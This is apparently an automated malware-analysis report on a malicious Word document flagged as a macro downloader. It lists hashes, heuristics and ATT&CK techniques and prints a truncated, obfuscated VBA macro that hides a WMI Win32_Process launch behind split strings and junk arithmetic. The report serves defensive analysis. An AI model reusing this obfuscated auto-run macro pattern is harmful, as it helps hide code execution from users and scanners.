Office (OLE) malware analysis — malicious · dedc8d1945bfd1e1

MALICIOUS

Office (OLE)

306.6 KB Created: 2019-02-19 14:27:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 71b3e07a5f218bc9288bd5a5aa09636b SHA-1: cfc71f577638725df926026a2864d005a5b38603 SHA-256: dedc8d1945bfd1e100a6b5d3c2e07015101a4c280dcbade7a7c216494211b263

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an AutoOpen function, a common technique for malicious documents. Critical heuristics indicate the use of WMI (Win32_Process) to launch processes, and obfuscation techniques were used to hide the API name. This suggests the macro is designed to download and execute a second-stage payload.

Heuristics 9

ClamAV: Doc.Downloader.00536d-6862699-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6862699-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54276 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	54276 bytes
SHA-256: `b5e5038b1fe4ebcdb09e8693d1f8e1d3e1d4e1fba0a7f12051d97c9e566e09e1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "B_54___2" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "V__2_4_" Function m___78() If K4017_88 <> b70323_ Then w6__3_ = 676411380 + CSng(902769596) * 639371999 * ChrB(305851574) * (i49127_1 / CDbl(111091278 + CBool(o_484098 - Int(215231100 / C74581__ * 866800844 / Cos(n_422_)))) - (E2503_ + Oct(901098556) + 407681515 / 405586109)) End If If n4373_60 <> Y7_223 Then W__33_55 = 547900059 + CSng(661605813) * 280709795 * ChrB(135003218) * (f_994_ / CDbl(278516587 + CBool(I2_03929 - Int(124385894 / Y__9163 * 862424473 / Cos(V173__77)))) - (Y___1522 + Oct(739909078) + 460911697 / 70907849)) End If If j6474_76 <> b_238744 Then D___407 = 525097009 + CSng(132546479) * 559897912 * ChrB(142835119) * (Z040908 / CDbl(671911760 + CBool(s58174 - Int(973284356 / S1__8739 * 309879371 / Cos(Z_7997)))) - (j80_0817 + Oct(740033666) + 674475802 / 932573343)) End If If A7_126 <> H_3_11 Then E866681 = 988769228 + CSng(184794271) * 176105590 * ChrB(697053438) * (Z907615 / CDbl(896653395 + CBool(h36754 - Int(584255276 / m875_7_ * 511239702 / Cos(s_0_0058)))) - (A0856_4 + Oct(40243315) + 5296533 / 714676121)) End If If h__1_5_ <> C2397872 Then B_61490_ = 291262482 + CSng(327691649) * 526955138 * ChrB(338547165) * (t3029_ / CDbl(721697075 + CBool(V604_94 - Int(453883908 / u_84_963 * 496157512 / Cos(H022_5_)))) - (R325_98 + Oct(366162956) + 841894559 / 210075743)) End If If i0632906 <> w16759_ Then N46__4_9 = 301077372 + CSng(126024532) * 793403221 * ChrB(568524520) * (r400_5_ / CDbl(364834565 + CBool(Q_8_48 - Int(362601566 / z884_9 * 900735792 / Cos(T55_8793)))) - (A62__20_ + Oct(683775718) + 77478731 / 333150039)) End If If M_54_988 <> O_136924 Then z_395790 = 97617899 + CSng(900149016) * 939208228 * ChrB(456224319) * (V_3887 / CDbl(783551027 + CBool(p82328 - Int(45821550 / w__50__5 * 38404569 / Cos(C__3__9)))) - (m_14_61 + Oct(207816199) + 316803171 / 477354883)) End If End Function Function w__2714(z43___7, D8_72279) On Error Resume Next If z8_15_8 <> H_9_844_ Then t58__73_ = 415669453 + CSng(177967222) * 542512675 * ChrB(34188839) * (l60__0 / CDbl(694434581 + CBool(w7_12_ - Int(888388735 / V6437918 * 166393358 / Cos(w52884)))) - (V_02739 + Oct(461859523) + 58738133 / 456795723)) End If If m6_79_ <> N39679 Then m557_9_ = 408586963 + CSng(183025097) * 652457175 * ChrB(255373042) * (H2_515 / CDbl(526487716 + CBool(n2__06 - Int(229697226 / f524_1_ * 173358459 / Cos(V4_0912)))) - (C752888 + Oct(199501376) + 506349595 / 966912781)) End If If H_99_0_9 <> r_8438_ Then n5_0_636 = 660236173 + CSng(784043701) * 561509502 * ChrB(88675836) * (K804_1 / CDbl(812193441 + CBool(V_3__7 - Int(906694307 / r71834_4 * 588500475 / Cos(q_59_5)))) - (Q_53_58 + Oct(803682559) + 548836369 / 588980858)) End If Set w8063_54 = GetObject(r99__9_ + "winmgm" + R8_53965 + "ts:Win" + "32_Proce" + "ssStartup") If J6_540_0 <> D42_4631 Then f239_607 = 332230605 + CSng(868432359) * 118011931 * ChrB(208874536) * (z36973 / CDbl(809551050 + CBool(I_93706 - Int(896829033 / w32447 * 842602653 / Cos(T3__5__)))) - (i87148 + Oct(986953957) + 767073285 / 214428337)) End If If k290_3 <> Q___17 Then L_2_570 = 529709120 + CSng(868056260) * 422481843 * ChrB(548254372) * (Z905819 / CDbl(835499105 + CBool(i5__429 - Int(864370957 / l__0_047 * 54889224 / Cos(i06_218)))) - (D_04798 + Oct(675878004) + 366702240 / 404302499)) End If w8063_54.ShowWindow = 338002 - 338002 If Z7_67_ <> I224325_ Then A__01144 = 780998169 + CSng(384515749) * 67235128 * ChrB(855867520) * (P_6_8_ / CDbl(722785790 + CBool(w7__01 - Int(301122005 / B3547_ * 416842574 / Cos(J_0954)))) - (V_65_4__ + Oct(819103689) + 147386499 / 242687250)) End If If H__222_ <> h_7_76 Then j965215 = 325476201 + CSng(837827693) * 609776461 * ChrB(916626818) * (i85_8178 / CDbl(56292241 + CBool(O1418_ - Int(172722893 / F5 ... (truncated)

SHA-256: b5e5038b1fe4ebcdb09e8693d1f8e1d3e1d4e1fba0a7f12051d97c9e566e09e1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "B_54___2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "V__2_4_"
Function m___78()
   If K4017_88 <> b70323_ Then
w6__3_ = 676411380 + CSng(902769596) * 639371999 * ChrB(305851574) * (i49127_1 / CDbl(111091278 + CBool(o_484098 - Int(215231100 / C74581__ * 866800844 / Cos(n_422_)))) - (E2503_ + Oct(901098556) + 407681515 / 405586109))
End If
   If n4373_60 <> Y7_223 Then
W__33_55 = 547900059 + CSng(661605813) * 280709795 * ChrB(135003218) * (f_994_ / CDbl(278516587 + CBool(I2_03929 - Int(124385894 / Y__9163 * 862424473 / Cos(V173__77)))) - (Y___1522 + Oct(739909078) + 460911697 / 70907849))
End If
   If j6474_76 <> b_238744 Then
D___407 = 525097009 + CSng(132546479) * 559897912 * ChrB(142835119) * (Z040908 / CDbl(671911760 + CBool(s58174 - Int(973284356 / S1__8739 * 309879371 / Cos(Z_7997)))) - (j80_0817 + Oct(740033666) + 674475802 / 932573343))
End If
   If A7_126 <> H_3_11 Then
E866681 = 988769228 + CSng(184794271) * 176105590 * ChrB(697053438) * (Z907615 / CDbl(896653395 + CBool(h36754 - Int(584255276 / m875_7_ * 511239702 / Cos(s_0_0058)))) - (A0856_4 + Oct(40243315) + 5296533 / 714676121))
End If
   If h__1_5_ <> C2397872 Then
B_61490_ = 291262482 + CSng(327691649) * 526955138 * ChrB(338547165) * (t3029_ / CDbl(721697075 + CBool(V604_94 - Int(453883908 / u_84_963 * 496157512 / Cos(H022_5_)))) - (R325_98 + Oct(366162956) + 841894559 / 210075743))
End If
   If i0632906 <> w16759_ Then
N46__4_9 = 301077372 + CSng(126024532) * 793403221 * ChrB(568524520) * (r400_5_ / CDbl(364834565 + CBool(Q_8_48 - Int(362601566 / z884_9 * 900735792 / Cos(T55_8793)))) - (A62__20_ + Oct(683775718) + 77478731 / 333150039))
End If
   If M_54_988 <> O_136924 Then
z_395790 = 97617899 + CSng(900149016) * 939208228 * ChrB(456224319) * (V_3887 / CDbl(783551027 + CBool(p82328 - Int(45821550 / w__50__5 * 38404569 / Cos(C__3__9)))) - (m_14_61 + Oct(207816199) + 316803171 / 477354883))
End If
End Function
Function w__2714(z43___7, D8_72279)
On Error Resume Next
   If z8_15_8 <> H_9_844_ Then
t58__73_ = 415669453 + CSng(177967222) * 542512675 * ChrB(34188839) * (l60__0 / CDbl(694434581 + CBool(w7_12_ - Int(888388735 / V6437918 * 166393358 / Cos(w52884)))) - (V_02739 + Oct(461859523) + 58738133 / 456795723))
End If
   If m6_79_ <> N39679 Then
m557_9_ = 408586963 + CSng(183025097) * 652457175 * ChrB(255373042) * (H2_515 / CDbl(526487716 + CBool(n2__06 - Int(229697226 / f524_1_ * 173358459 / Cos(V4_0912)))) - (C752888 + Oct(199501376) + 506349595 / 966912781))
End If
   If H_99_0_9 <> r_8438_ Then
n5_0_636 = 660236173 + CSng(784043701) * 561509502 * ChrB(88675836) * (K804_1 / CDbl(812193441 + CBool(V_3__7 - Int(906694307 / r71834_4 * 588500475 / Cos(q_59_5)))) - (Q_53_58 + Oct(803682559) + 548836369 / 588980858))
End If
Set w8063_54 = GetObject(r99__9_ + "winmgm" + R8_53965 + "ts:Win" + "32_Proce" + "ssStartup")
   If J6_540_0 <> D42_4631 Then
f239_607 = 332230605 + CSng(868432359) * 118011931 * ChrB(208874536) * (z36973 / CDbl(809551050 + CBool(I_93706 - Int(896829033 / w32447 * 842602653 / Cos(T3__5__)))) - (i87148 + Oct(986953957) + 767073285 / 214428337))
End If
   If k290_3 <> Q___17 Then
L_2_570 = 529709120 + CSng(868056260) * 422481843 * ChrB(548254372) * (Z905819 / CDbl(835499105 + CBool(i5__429 - Int(864370957 / l__0_047 * 54889224 / Cos(i06_218)))) - (D_04798 + Oct(675878004) + 366702240 / 404302499))
End If
w8063_54.ShowWindow = 338002 - 338002
   If Z7_67_ <> I224325_ Then
A__01144 = 780998169 + CSng(384515749) * 67235128 * ChrB(855867520) * (P_6_8_ / CDbl(722785790 + CBool(w7__01 - Int(301122005 / B3547_ * 416842574 / Cos(J_0954)))) - (V_65_4__ + Oct(819103689) + 147386499 / 242687250))
End If
   If H__222_ <> h_7_76 Then
j965215 = 325476201 + CSng(837827693) * 609776461 * ChrB(916626818) * (i85_8178 / CDbl(56292241 + CBool(O1418_ - Int(172722893 / F5
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.